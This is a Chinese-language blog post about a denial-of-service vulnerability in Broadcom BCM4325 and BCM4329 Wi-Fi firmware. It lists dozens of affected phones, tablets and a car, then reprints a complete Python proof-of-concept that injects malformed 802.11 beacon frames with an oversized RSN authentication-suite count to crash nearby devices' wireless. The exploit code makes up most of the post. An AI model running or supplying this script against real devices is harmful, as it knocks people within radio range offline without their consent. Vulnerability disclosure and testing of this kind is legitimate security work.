- A+
此次出现漏洞的是Broadcom的无线网卡固件,型号为BCM4325和BCM4329,攻击者可以通过发送特定的无线网络数据包导致拒绝服务攻击。
主要影响的设备有:
-
BCM4325
-
Apple iPhone 3GS
-
Apple iPod 2G
-
HTC Touch Pro 2
-
HTC Droid Incredible
-
Samsung Spica
-
Acer Liquid
-
Motorola Devour
-
Ford Edge (yes, it’s a car)
-
BCM4329
-
Apple iPhone 4
-
Apple iPhone 4 Verizon
-
Apple iPod 3G
-
Apple iPad Wi-Fi
-
Apple iPad 3G
-
Apple iPad 2
-
Apple Tv 2G
-
Motorola Xoom
-
Motorola Droid X2
-
Motorola Atrix
-
Samsung Galaxy Tab
-
Samsung Galaxy S 4G
-
Samsung Nexus S
-
Samsung Stratosphere
-
Samsung Fascinate
-
HTC Nexus One
-
HTC Evo 4G
-
HTC ThunderBolt
-
HTC Droid Incredible 2
-
LG Revolution
-
Sony Ericsson Xperia Play
-
Pantech Breakout
-
Nokia Lumina 800
-
Kyocera Echo
-
Asus Transformer Prime
-
Malata ZPad
可以看到苹果三星都在其中,估计影响的范围是比较大的。漏洞由Andres Blanco发现,Core Impact team的 Andres Blanco和 Matias Eissler写出了漏洞的POC,POC如下:
本POC在python开源库 library Lorcon和 PyLorcon2下实现
------------------------- poc.py -------------------------
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096
# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += '\x00' # Flags: 0
frame += '\x00\x00' # Duration: 0
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
frame += '\x11\x04' # Capability Information: ESS, Privacy,
Short Slot time
# Information Elements
# SSID: buggy
frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
frame += '\x01\x00' # Pairwise cipher suite count: 1
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
frame += '\xff\xff' # Authentication suites count: 65535
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
frame += '\x00\x00'
sequence += 1
yield frame
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)
iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()
generator = beaconFrameGenerator()
for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
